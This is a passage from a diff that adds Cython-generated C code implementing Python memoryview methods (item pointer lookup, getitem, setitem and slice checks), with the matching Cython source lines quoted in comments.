*get_item_pointer(memoryview self, object index) except NULL: + */ + PyThread_free_lock(__pyx_v_self->lock); + } + __pyx_L6_break:; + + /* "View.MemoryView":386 + * cdef int i + * global __pyx_memoryview_thread_locks_used + * if self.lock != NULL: # <<<<<<<<<<<<<< + * for i in range(__pyx_memoryview_thread_locks_used): + * if __pyx_memoryview_thread_locks[i] is self.lock: + */ + } + + /* "View.MemoryView":376 + * self.typeinfo = NULL + * + * def __dealloc__(memoryview self): # <<<<<<<<<<<<<< + * if self.obj is not None: + * __Pyx_ReleaseBuffer(&self.view) + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":397 + * PyThread_free_lock(self.lock) + * + * cdef char *get_item_pointer(memoryview self, object index) except NULL: # <<<<<<<<<<<<<< + * cdef Py_ssize_t dim + * cdef char *itemp = self.view.buf + */ + +static char *__pyx_memoryview_get_item_pointer(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index) { + Py_ssize_t __pyx_v_dim; + char *__pyx_v_itemp; + PyObject *__pyx_v_idx = NULL; + char *__pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + Py_ssize_t __pyx_t_3; + PyObject *(*__pyx_t_4)(PyObject *); + PyObject *__pyx_t_5 = NULL; + Py_ssize_t __pyx_t_6; + char *__pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_item_pointer", 0); + + /* "View.MemoryView":399 + * cdef char *get_item_pointer(memoryview self, object index) except NULL: + * cdef Py_ssize_t dim + * cdef char *itemp = self.view.buf # <<<<<<<<<<<<<< + * + * for dim, idx in enumerate(index): + */ + __pyx_v_itemp = ((char *)__pyx_v_self->view.buf); + + /* "View.MemoryView":401 + * cdef char *itemp = self.view.buf + * + * for dim, idx in enumerate(index): # <<<<<<<<<<<<<< + * itemp = pybuffer_index(&self.view, itemp, idx, dim) + * + */ + __pyx_t_1 = 0; + if (likely(PyList_CheckExact(__pyx_v_index)) || PyTuple_CheckExact(__pyx_v_index)) { + __pyx_t_2 = __pyx_v_index; __Pyx_INCREF(__pyx_t_2); __pyx_t_3 = 0; + __pyx_t_4 = NULL; + } else { + __pyx_t_3 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_v_index); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 401, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_4)) { + if (likely(PyList_CheckExact(__pyx_t_2))) { + if (__pyx_t_3 >= PyList_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_5 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_3); __Pyx_INCREF(__pyx_t_5); __pyx_t_3++; if (unlikely((0 < 0))) __PYX_ERR(1, 401, __pyx_L1_error) + #else + __pyx_t_5 = PySequence_ITEM(__pyx_t_2, __pyx_t_3); __pyx_t_3++; if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + #endif + } else { + if (__pyx_t_3 >= PyTuple_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_5 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_3); __Pyx_INCREF(__pyx_t_5); __pyx_t_3++; if (unlikely((0 < 0))) __PYX_ERR(1, 401, __pyx_L1_error) + #else + __pyx_t_5 = PySequence_ITEM(__pyx_t_2, __pyx_t_3); __pyx_t_3++; if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + #endif + } + } else { + __pyx_t_5 = __pyx_t_4(__pyx_t_2); + if (unlikely(!__pyx_t_5)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 401, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_5); + } + __Pyx_XDECREF_SET(__pyx_v_idx, __pyx_t_5); + __pyx_t_5 = 0; + __pyx_v_dim = __pyx_t_1; + __pyx_t_1 = (__pyx_t_1 + 1); + + /* "View.MemoryView":402 + * + * for dim, idx in enumerate(index): + * itemp = pybuffer_index(&self.view, itemp, idx, dim) # <<<<<<<<<<<<<< + * + * return itemp + */ + __pyx_t_6 = __Pyx_PyIndex_AsSsize_t(__pyx_v_idx); if (unlikely((__pyx_t_6 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 402, __pyx_L1_error) + __pyx_t_7 = __pyx_pybuffer_index((&__pyx_v_self->view), __pyx_v_itemp, __pyx_t_6, __pyx_v_dim); if (unlikely(__pyx_t_7 == ((char *)NULL))) __PYX_ERR(1, 402, __pyx_L1_error) + __pyx_v_itemp = __pyx_t_7; + + /* "View.MemoryView":401 + * cdef char *itemp = self.view.buf + * + * for dim, idx in enumerate(index): # <<<<<<<<<<<<<< + * itemp = pybuffer_index(&self.view, itemp, idx, dim) + * + */ + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":404 + * itemp = pybuffer_index(&self.view, itemp, idx, dim) + * + * return itemp # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = __pyx_v_itemp; + goto __pyx_L0; + + /* "View.MemoryView":397 + * PyThread_free_lock(self.lock) + * + * cdef char *get_item_pointer(memoryview self, object index) except NULL: # <<<<<<<<<<<<<< + * cdef Py_ssize_t dim + * cdef char *itemp = self.view.buf + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.memoryview.get_item_pointer", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_idx); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":407 + * + * + * def __getitem__(memoryview self, object index): # <<<<<<<<<<<<<< + * if index is Ellipsis: + * return self + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index); /*proto*/ +static PyObject *__pyx_memoryview___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getitem__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_4__getitem__(((struct __pyx_memoryview_obj *)__pyx_v_self), ((PyObject *)__pyx_v_index)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_4__getitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index) { + PyObject *__pyx_v_have_slices = NULL; + PyObject *__pyx_v_indices = NULL; + char *__pyx_v_itemp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + char *__pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__getitem__", 0); + + /* "View.MemoryView":408 + * + * def __getitem__(memoryview self, object index): + * if index is Ellipsis: # <<<<<<<<<<<<<< + * return self + * + */ + __pyx_t_1 = (__pyx_v_index == __pyx_builtin_Ellipsis); + if (__pyx_t_1) { + + /* "View.MemoryView":409 + * def __getitem__(memoryview self, object index): + * if index is Ellipsis: + * return self # <<<<<<<<<<<<<< + * + * have_slices, indices = _unellipsify(index, self.view.ndim) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_self); + __pyx_r = ((PyObject *)__pyx_v_self); + goto __pyx_L0; + + /* "View.MemoryView":408 + * + * def __getitem__(memoryview self, object index): + * if index is Ellipsis: # <<<<<<<<<<<<<< + * return self + * + */ + } + + /* "View.MemoryView":411 + * return self + * + * have_slices, indices = _unellipsify(index, self.view.ndim) # <<<<<<<<<<<<<< + * + * cdef char *itemp + */ + __pyx_t_2 = _unellipsify(__pyx_v_index, __pyx_v_self->view.ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 411, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (likely(__pyx_t_2 != Py_None)) { + PyObject* sequence = __pyx_t_2; + Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); + if (unlikely(size != 2)) { + if (size > 2) __Pyx_RaiseTooManyValuesError(2); + else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); + __PYX_ERR(1, 411, __pyx_L1_error) + } + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_3 = PyTuple_GET_ITEM(sequence, 0); + __pyx_t_4 = PyTuple_GET_ITEM(sequence, 1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + #else + __pyx_t_3 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 411, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 411, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } else { + __Pyx_RaiseNoneNotIterableError(); __PYX_ERR(1, 411, __pyx_L1_error) + } + __pyx_v_have_slices = __pyx_t_3; + __pyx_t_3 = 0; + __pyx_v_indices = __pyx_t_4; + __pyx_t_4 = 0; + + /* "View.MemoryView":414 + * + * cdef char *itemp + * if have_slices: # <<<<<<<<<<<<<< + * return memview_slice(self, indices) + * else: + */ + __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_v_have_slices); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 414, __pyx_L1_error) + if (__pyx_t_1) { + + /* "View.MemoryView":415 + * cdef char *itemp + * if have_slices: + * return memview_slice(self, indices) # <<<<<<<<<<<<<< + * else: + * itemp = self.get_item_pointer(indices) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = ((PyObject *)__pyx_memview_slice(__pyx_v_self, __pyx_v_indices)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 415, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":414 + * + * cdef char *itemp + * if have_slices: # <<<<<<<<<<<<<< + * return memview_slice(self, indices) + * else: + */ + } + + /* "View.MemoryView":417 + * return memview_slice(self, indices) + * else: + * itemp = self.get_item_pointer(indices) # <<<<<<<<<<<<<< + * return self.convert_item_to_object(itemp) + * + */ + /*else*/ { + __pyx_t_5 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->get_item_pointer(__pyx_v_self, __pyx_v_indices); if (unlikely(__pyx_t_5 == ((char *)NULL))) __PYX_ERR(1, 417, __pyx_L1_error) + __pyx_v_itemp = __pyx_t_5; + + /* "View.MemoryView":418 + * else: + * itemp = self.get_item_pointer(indices) + * return self.convert_item_to_object(itemp) # <<<<<<<<<<<<<< + * + * def __setitem__(memoryview self, object index, object value): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->convert_item_to_object(__pyx_v_self, __pyx_v_itemp); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 418, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + } + + /* "View.MemoryView":407 + * + * + * def __getitem__(memoryview self, object index): # <<<<<<<<<<<<<< + * if index is Ellipsis: + * return self + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.memoryview.__getitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_have_slices); + __Pyx_XDECREF(__pyx_v_indices); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":420 + * return self.convert_item_to_object(itemp) + * + * def __setitem__(memoryview self, object index, object value): # <<<<<<<<<<<<<< + * if self.view.readonly: + * raise TypeError, "Cannot assign to read-only memoryview" + */ + +/* Python wrapper */ +static int __pyx_memoryview___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_memoryview___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setitem__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_6__setitem__(((struct __pyx_memoryview_obj *)__pyx_v_self), ((PyObject *)__pyx_v_index), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_6__setitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value) { + PyObject *__pyx_v_have_slices = NULL; + PyObject *__pyx_v_obj = NULL; + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setitem__", 0); + __Pyx_INCREF(__pyx_v_index); + + /* "View.MemoryView":421 + * + * def __setitem__(memoryview self, object index, object value): + * if self.view.readonly: # <<<<<<<<<<<<<< + * raise TypeError, "Cannot assign to read-only memoryview" + * + */ + if (unlikely(__pyx_v_self->view.readonly)) { + + /* "View.MemoryView":422 + * def __setitem__(memoryview self, object index, object value): + * if self.view.readonly: + * raise TypeError, "Cannot assign to read-only memoryview" # <<<<<<<<<<<<<< + * + * have_slices, index = _unellipsify(index, self.view.ndim) + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_Cannot_assign_to_read_only_memor, 0, 0); + __PYX_ERR(1, 422, __pyx_L1_error) + + /* "View.MemoryView":421 + * + * def __setitem__(memoryview self, object index, object value): + * if self.view.readonly: # <<<<<<<<<<<<<< + * raise TypeError, "Cannot assign to read-only memoryview" + * + */ + } + + /* "View.MemoryView":424 + * raise TypeError, "Cannot assign to read-only memoryview" + * + * have_slices, index = _unellipsify(index, self.view.ndim) # <<<<<<<<<<<<<< + * + * if have_slices: + */ + __pyx_t_1 = _unellipsify(__pyx_v_index, __pyx_v_self->view.ndim); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 424, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (likely(__pyx_t_1 != Py_None)) { + PyObject* sequence = __pyx_t_1; + Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); + if (unlikely(size != 2)) { + if (size > 2) __Pyx_RaiseTooManyValuesError(2); + else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); + __PYX_ERR(1, 424, __pyx_L1_error) + } + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); + __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); + __Pyx_INCREF(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + #else + __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 424, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 424, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + #endif + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } else { + __Pyx_RaiseNoneNotIterableError(); __PYX_ERR(1, 424, __pyx_L1_error) + } + __pyx_v_have_slices = __pyx_t_2; + __pyx_t_2 = 0; + __Pyx_DECREF_SET(__pyx_v_index, __pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":426 + * have_slices, index = _unellipsify(index, self.view.ndim) + * + * if have_slices: # <<<<<<<<<<<<<< + * obj = self.is_slice(value) + * if obj: + */ + __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_v_have_slices); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(1, 426, __pyx_L1_error) + if (__pyx_t_4) { + + /* "View.MemoryView":427 + * + * if have_slices: + * obj = self.is_slice(value) # <<<<<<<<<<<<<< + * if obj: + * self.setitem_slice_assignment(self[index], obj) + */ + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->is_slice(__pyx_v_self, __pyx_v_value); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 427, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_obj = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":428 + * if have_slices: + * obj = self.is_slice(value) + * if obj: # <<<<<<<<<<<<<< + * self.setitem_slice_assignment(self[index], obj) + * else: + */ + __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_v_obj); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(1, 428, __pyx_L1_error) + if (__pyx_t_4) { + + /* "View.MemoryView":429 + * obj = self.is_slice(value) + * if obj: + * self.setitem_slice_assignment(self[index], obj) # <<<<<<<<<<<<<< + * else: + * self.setitem_slice_assign_scalar(self[index], value) + */ + __pyx_t_1 = __Pyx_PyObject_GetItem(((PyObject *)__pyx_v_self), __pyx_v_index); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 429, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->setitem_slice_assignment(__pyx_v_self, __pyx_t_1, __pyx_v_obj); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 429, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "View.MemoryView":428 + * if have_slices: + * obj = self.is_slice(value) + * if obj: # <<<<<<<<<<<<<< + * self.setitem_slice_assignment(self[index], obj) + * else: + */ + goto __pyx_L5; + } + + /* "View.MemoryView":431 + * self.setitem_slice_assignment(self[index], obj) + * else: + * self.setitem_slice_assign_scalar(self[index], value) # <<<<<<<<<<<<<< + * else: + * self.setitem_indexed(index, value) + */ + /*else*/ { + __pyx_t_3 = __Pyx_PyObject_GetItem(((PyObject *)__pyx_v_self), __pyx_v_index); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 431, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (!(likely(((__pyx_t_3) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_3, __pyx_memoryview_type))))) __PYX_ERR(1, 431, __pyx_L1_error) + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->setitem_slice_assign_scalar(__pyx_v_self, ((struct __pyx_memoryview_obj *)__pyx_t_3), __pyx_v_value); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 431, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_L5:; + + /* "View.MemoryView":426 + * have_slices, index = _unellipsify(index, self.view.ndim) + * + * if have_slices: # <<<<<<<<<<<<<< + * obj = self.is_slice(value) + * if obj: + */ + goto __pyx_L4; + } + + /* "View.MemoryView":433 + * self.setitem_slice_assign_scalar(self[index], value) + * else: + * self.setitem_indexed(index, value) # <<<<<<<<<<<<<< + * + * cdef is_slice(self, obj): + */ + /*else*/ { + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->setitem_indexed(__pyx_v_self, __pyx_v_index, __pyx_v_value); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 433, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_L4:; + + /* "View.MemoryView":420 + * return self.convert_item_to_object(itemp) + * + * def __setitem__(memoryview self, object index, object value): # <<<<<<<<<<<<<< + * if self.view.readonly: + * raise TypeError, "Cannot assign to read-only memoryview" + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.__setitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_have_slices); + __Pyx_XDECREF(__pyx_v_obj); + __Pyx_XDECREF(__pyx_v_index); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":435 + * self.setitem_indexed(index, value) + * + * cdef is_slice(self, obj): # <<<<<<<<<<<<<< + * if not isinstance(obj, memoryview): + * try: + */ + +static PyObject *__pyx_memoryview_is_slice(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("is_slice", 0); + __Pyx_INCREF(__pyx_v_obj); + + /* "View.MemoryView":436 + * + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): # <<<<<<<<<<<<<< + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + */ + __pyx_t_1 = __Pyx_TypeCheck(__pyx_v_obj, __pyx_memoryview_type); + __pyx_t_2 = (!__pyx_t_1); + if (__pyx_t_2) { + + /* "View.MemoryView":437 + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): + * try: # <<<<<<<<<<<<<< + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_3, &__pyx_t_4, &__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_4); + __Pyx_XGOTREF(__pyx_t_5); + /*try:*/ { + + /* "View.MemoryView":438 + * if not isinstance(obj, memoryview): + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, # <<<<<<<<<<<<<< + * self.dtype_is_object) + * except TypeError: + */ + __pyx_t_6 = __Pyx_PyInt_From_int(((__pyx_v_self->flags & (~PyBUF_WRITABLE)) | PyBUF_ANY_CONTIGUOUS)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 438, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_6); + + /* "View.MemoryView":439 + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) # <<<<<<<<<<<<<< + * except TypeError: + * return None + */ + __pyx_t_7 = __Pyx_PyBool_FromLong(__pyx_v_self->dtype_is_object); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 439, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_7); + + /* "View.MemoryView":438 + * if not isinstance(obj, memoryview): + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, # <<<<<<<<<<<<<< + * self.dtype_is_object) + * except TypeError: + */ + __pyx_t_8 = PyTuple_New(3); if (unlikely(!__pyx_t_8)) __PYX_ERR(1, 438, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_INCREF(__pyx_v_obj); + __Pyx_GIVEREF(__pyx_v_obj); + PyTuple_SET_ITEM(__pyx_t_8, 0, __pyx_v_obj); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_8, 1, __pyx_t_6); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_8, 2, __pyx_t_7); + __pyx_t_6 = 0; + __pyx_t_7 = 0; + __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)__pyx_memoryview_type), __pyx_t_8, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 438, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF_SET(__pyx_v_obj, __pyx_t_7); + __pyx_t_7 = 0; + + /* "View.MemoryView":437 + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): + * try: # <<<<<<<<<<<<<< + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + */ + } + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + goto __pyx_L9_try_end; + __pyx_L4_error:; + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + + /* "View.MemoryView":440 + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + * except TypeError: # <<<<<<<<<<<<<< + * return None + * + */ + __pyx_t_9 = __Pyx_PyErr_ExceptionMatches(__pyx_builtin_TypeError); + if (__pyx_t_9) { + __Pyx_AddTraceback("View.MemoryView.memoryview.is_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_7, &__pyx_t_8, &__pyx_t_6) < 0) __PYX_ERR(1, 440, __pyx_L6_except_error) + __Pyx_XGOTREF(__pyx_t_7); + __Pyx_XGOTREF(__pyx_t_8); + __Pyx_XGOTREF(__pyx_t_6); + + /* "View.MemoryView":441 + * self.dtype_is_object) + * except TypeError: + * return None # <<<<<<<<<<<<<< + * + * return obj + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L7_except_return; + } + goto __pyx_L6_except_error; + + /* "View.MemoryView":437 + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): + * try: # <<<<<<<<<<<<<< + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + * self.dtype_is_object) + */ + __pyx_L6_except_error:; + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_XGIVEREF(__pyx_t_5); + __Pyx_ExceptionReset(__pyx_t_3, __pyx_t_4, __pyx_t_5); + goto __pyx_L1_error; + __pyx_L7_except_return:; + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_XGIVEREF(__pyx_t_5); + __Pyx_ExceptionReset(__pyx_t_3, __pyx_t_4, __pyx_t_5); + goto __pyx_L0; + __pyx_L9_try_end:; + } + + /* "View.MemoryView":436 + * + * cdef is_slice(self, obj): + * if not isinstance(obj, memoryview): # <<<<<<<<<<<<<< + * try: + * obj = memoryview(obj, self.flags & ~PyBUF_WRITABLE | PyBUF_ANY_CONTIGUOUS, + */ + } + + /* "View.MemoryView":443 + * return None + * + * return obj # <<<<<<<<<<<<<< + * + * cdef setitem_slice_assignment(self, dst, src): 